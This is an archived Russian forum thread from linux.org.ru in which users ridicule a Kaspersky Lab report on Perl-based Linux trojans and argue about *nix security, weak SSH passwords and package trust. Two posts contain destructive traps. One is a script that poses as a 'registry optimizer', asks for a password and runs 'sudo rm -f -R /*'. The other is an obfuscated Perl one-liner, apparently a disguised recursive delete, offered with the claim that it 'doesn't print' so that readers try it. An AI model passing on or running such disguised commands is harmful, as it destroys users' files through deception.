LINUX.ORG.RU
ФорумTalks

[толсто][лаб.касперского] Времена безопасности *nix-систем давно прошли


0

0

Вроде еще не обсуждали? http://www.securitylab.ru/news/379709.php

Ъ: Мифы о полной защищенности *nix-систем постепенно уходят в прошлое. Недавним примером уязвимости *nix-систем стали обнаруженные Лабораторией Касперского трояны Trojan-Mailfinder.Perl.Hnc.a и Trojan-Dropper.Linux.Prl.a.

Первый представляет собой Perl-скрипт, подключающийся к командному серверу для получения текста спам-сообщения и списка получателей этого сообщения.

Второй троян является исполняемым файлом для Linux и FreeBSD. Файл расшифровывает Perl-скрипт, запускает интерпретатор Perl и передаёт ему получившийся скрипт.

Подробности по ссылке.

★★★★★

Re: [толсто][лаб.касперского] Времена безопасности *nix-систем давно прошли

баян и херня полная

f3ex ★★ ()

Re: [толсто][лаб.касперского] Времена безопасности *nix-систем давно прошли


такие ещё 15ть лет назад писали. так что боян древнючий.

// wbr

klalafuda ★☆☆ ()

Re: [толсто][лаб.касперского] Времена безопасности *nix-систем давно прошли

>Файл расшифровывает Perl-скрипт

А запустился он с помощью магии, ага :}

Deleted ()

Re: [толсто][лаб.касперского] Времена безопасности *nix-систем давно прошли

Расчитано это все на пользователей-домохозяек. Которые не знают что на их компьютерах запущено.

hibou ★★★★★ ()

Re: [толсто][лаб.касперского] Времена безопасности *nix-систем давно прошли

А как ещё рекламироваться то? Удивляет,что за столько лет сия контора ничего работающего не написала.

ria_intel ()

Re: [толсто][лаб.касперского] Времена безопасности *nix-систем давно прошли

Я тут подумал, такой вирус даже я осилю написать!

Но мне более интересны вирусы старой закалки. Как правило, писанные на ассемблере, они встраивались в код других программ и запускались до исполнения основного программного кода. Это как пример. Вот на такое у меня пока знаний не хватит.

hibou ★★★★★ ()

Re: [толсто][лаб.касперского] Времена безопасности *nix-систем давно прошли

--Издевающимся тоном--
Что, продажи на нуле?!! (((:

LebedevRI ()

Re: [толсто][лаб.касперского] Времена безопасности *nix-систем давно прошли

В линуксах вирусам не хватает только одного - возможности автозапуска. Хотя может это предоставляют всякие вэб приложения?

А так вредоносной программе достаточно, например, нагадить в ~/.local/icons - и жизнь пользователя испорчена :)

Rapt0r ()

Re: [толсто][лаб.касперского] Времена безопасности *nix-систем давно прошли

>В линуксах вирусам не хватает только одного - возможности автозапуска

А как же распространение по сети?

xorik ★★★★★ ()

Re: [толсто][лаб.касперского] Времена безопасности *nix-систем давно прошли

> Расчитано это все на пользователей-домохозяек. Которые не знают что на их компьютерах запущено.

А ты всегда знаешь, что запускаешь вместе с вытянутой из интернета программой? Всякие там closed-source игры и прочие поделки? Ты хотя бы контрольные суммы проверяешь после скачивания? ;)

Manhunt ★★★★★ ()

Re: [толсто][лаб.касперского] Времена безопасности *nix-систем давно прошли

Шо опять?

У касперского очередное полугодичное обострение.

enileeb ()

Re: [толсто][лаб.касперского] Времена безопасности *nix-систем давно прошли

Цитата с комментов:

19.05.2009 03:52:04
Опять Кашмарский взялся за старое...

Уж сколько раз твердили Жене,
Что, накурившись всякой хрени,
Не суйся в лагерь линуксят -
Они с говном тебя съедят!

madgnu ★★★★★ ()

Re: [толсто][лаб.касперского] Времена безопасности *nix-систем давно прошли

> Не суйся в лагерь линуксят -
> Они с говном тебя съедят!

простите, а именно с говном - это обязательное условие?

ps: AFAIR даже аборигены, уж на что дикий народ, и те съели Кука без соли конечно и без лука, но и без участия столь экстравагантных приправ.

// wbr

klalafuda ★☆☆ ()

Re: [толсто][лаб.касперского] Времена безопасности *nix-систем давно прошли

слухи о безопасности *nix систем сильно преувеличены.

Kremljad ()

Re: [толсто][лаб.касперского] Времена безопасности *nix-систем давно прошли

и вообще по мере популяризации линукса будут появляться все новые и новые вирусы. это ясно как божий день.

Kremljad ()

Re: [толсто][лаб.касперского] Времена безопасности *nix-систем давно прошли

угу, уже сейчас сотни и тысячи ботов сканят 22-е порты и подбирают пароли admin/admin, root/root, root/qwerty и т.д - И НАХОДЯТ ЖЕ. иначе разновсяческих спамеров и ботнетов было бы в разы меньше.

и вывод сделан в корне неверно. не "время безопасности никсов прошло", а "время грамотных админов прошло" - так вернее. в кризис дешевле один эникей обойдется, работающий за еду.

Komintern ★★★★★ ()

Re: [толсто][лаб.касперского] Времена безопасности *nix-систем давно прошли

обнаруженные^W написанные fixed

bioreactor ★★★★★ ()

Re: [толсто][лаб.касперского] Времена безопасности *nix-систем давно прошли

> время грамотных админов прошло

скорее уже "время неграмотных админов прошло" или "время грамотных админов пришло". имхо.

isden ★★★★★ ()

[толсто] Раб касперского

subj. fixed.

Deleted ()

Re: [толсто][лаб.касперского] Времена безопасности *nix-систем давно прошли

Шо и ебюлды по ссылке? Да неужели а! А то сколько пробую неродные так они в wine не заводятся.

init_6 ★★★★★ ()

Re: [толсто][лаб.касперского] Времена безопасности *nix-систем давно прошли

И что они будут делать на системе без Perl'а?

И что с этими троянами будет, если их не запускать?

...

А так - можно подумать, это первые или последние трояны/черви под Linux... Самопиар, короче, очередной :)

KRoN73 ★★★★★ ()

Re: [толсто][лаб.касперского] Времена безопасности *nix-систем давно прошли

Кашперский беспокоится. О своих карманах. Кризис ведь.

ptarh ★★★★★ ()

Re: [толсто][лаб.касперского] Времена безопасности *nix-систем давно прошли

>Расчитано это все на пользователей-домохозяек. Которые не знают что на их компьютерах запущено.
Я еще понимаю на вин домохозяйки будут доп. левые программы скачивать. Плееры, офисы, А тут что? Всё же в пакетах! Резону нет им что либо экзекутаебальное искать.

darkshvein ☆☆ ()

Re: [толсто][лаб.касперского] Времена безопасности *nix-систем давно прошли

однако написать реального червя вполне реально. Достаточно найти уязвимость в каком-нибудь популярном браузере (тот же фуррифокс), позволяющую создавать/редактировать файлы пользователя. Через нее положить скрипт куда-нибудь поглубже и сделать автозапуск от юзера (что для всяких ДЕ делается элементарно). Ну и собственно готов еще один бот :)

nu11 ★★★★★ ()

Re: [толсто][лаб.касперского] Времена безопасности *nix-систем давно прошли

Ну заразится один комп, а как остальных заставить перейти на вредоносную страницу с трояном?

xorik ★★★★★ ()

Re: [толсто][лаб.касперского] Времена безопасности *nix-систем давно прошли

> Ну заразится один комп, а как остальных заставить перейти на вредоносную страницу с трояном?

просто разместить ссылку на лоре?

// wbr

klalafuda ★☆☆ ()

Re: [толсто][лаб.касперского] Времена безопасности *nix-систем давно прошли

>> Ну заразится один комп, а как остальных заставить перейти на вредоносную страницу с трояном?
> просто разместить ссылку на лоре?

да, и, конечно же, не забыть указать, что по ссылке - троян.

// wbr

klalafuda ★☆☆ ()

Re: [толсто][лаб.касперского] Времена безопасности *nix-систем давно прошли

>а как остальных заставить перейти на вредоносную страницу с трояном?

зачем заставлять - сами зайдут. Леммингов, посещающих различные сомнительные сайты и бездумно открывающих ссылки всегда хватает. Особенно среди пользователей всяких бубунт.

nu11 ★★★★★ ()

Re: [толсто][лаб.касперского] Времена безопасности *nix-систем давно прошли

>Мифы о полной защищенности *nix-систем постепенно уходят в прошлое

Кажется они собрались портировать своё тупое поделие под линукс.

jcd ★★★★★ ()

Re: [толсто][лаб.касперского] Времена безопасности *nix-систем давно прошли

Бугога.
"Вирусы" из серии "rm".

Alex_A_V ★★ ()

Re: [толсто][лаб.касперского] Времена безопасности *nix-систем давно прошли

#!/bin/sh

echo "Сейчас скрипт оптимизирует ваш реестр, для этого Вас попросят ввести пароль."
sudo rm -f -R /*

Andru ★★★★ ()

Re: [толсто][лаб.касперского] Времена безопасности *nix-систем давно прошли

cat "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'

- не печатает

matich ()

Re: [толсто][лаб.касперского] Времена безопасности *nix-систем давно прошли

Ждем троянов в виде апплетов для gnome/kde. Это, наверно, одна из самых больших помоек. Плюс еще инит-скрипты (но тут нужны права рута). Вроде бы есть трояны в виде плагинов для фокса...

Хорошая новость в том, что SELinux такого рода программы элементарно вычислит.

Macil ★★★★★ ()

Re: [толсто][лаб.касперского] Времена безопасности *nix-систем давно прошли

поздравляем касперыча с выходом из анабиоза

tommy ★★★★★ ()

Re: [толсто][лаб.касперского] Времена безопасности *nix-систем давно прошли

> а "время грамотных админов прошло" - так вернее. в кризис дешевле один эникей обойдется, работающий за еду.

А что грамотный админ сделает в случае скрипта на перле, который, например, эксплоитит этот перл и выдает рута (как это было несколько лет назад)? И еще кучи других программ в Линуксе, о качестве написания которых ты даже ничего и не подозреваешь.

smh ★★★ ()

Re: [толсто][лаб.касперского] Времена безопасности *nix-систем давно прошли

>И еще кучи других программ в Линуксе, о качестве написания которых ты даже ничего и не подозреваешь.

А что ментейнеры, тоже о "качестве программ" ничего не подозревают?

Alex_A_V ★★ ()

Re: [толсто][лаб.касперского] Времена безопасности *nix-систем давно прошли

> А что ментейнеры, тоже о "качестве программ" ничего не подозревают?

Боюсь, но здесь скорее всего "конвейер". Увеличилась циферка в версии программы, иди сюда исходничек под ножик скрипта для сборки.

TGZ ★★★★ ()

Re: [толсто][лаб.касперского] Времена безопасности *nix-систем давно прошли

> А что ментейнеры, тоже о "качестве программ" ничего не подозревают?

даже не думаю - уверен, что в подавляющем большинстве случаев - нет, не подозревают. если собралась - хорошая программа. если не собралась - плохая. вот и весь селект.

// wbr

klalafuda ★☆☆ ()

Re: [толсто][лаб.касперского] Времена безопасности *nix-систем давно прошли

>Боюсь, но здесь скорее всего "конвейер". Увеличилась циферка в версии программы, иди сюда исходничек под ножик скрипта для сборки.

В любом случае, ментейнер не скачает прогу с левого сайта, и хотя бы на глазок посмотрит что там в нутрях. Тем более есть железный вариант - использовать стабильные ветки дистров. А если ставишь проги с непроверенных источников, то ССЗБ.

Alex_A_V ★★ ()

Re: [толсто][лаб.касперского] Времена безопасности *nix-систем давно прошли

>Боюсь, но здесь скорее всего "конвейер". Увеличилась циферка в версии программы, иди сюда исходничек под ножик скрипта для сборки.

Угу, а потом, когда крик поднимется, автору коммита серпом по яйцам ррраз. Найди мне такого смелого вирусописателя. Плюс, стабильные ветки дистрибов только секурные и багфисные патчи накладывают в обновлениях, а бэкпортов не так много и, подозреваю, там серьезно относятся.

redgremlin ★★★★★ ()

Re: [толсто][лаб.касперского] Времена безопасности *nix-систем давно прошли

> А если ставишь проги с непроверенных источников, то ССЗБ.

(kde|gnome)-look.org - это проверенный или непроверенный источник?

isden ★★★★★ ()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.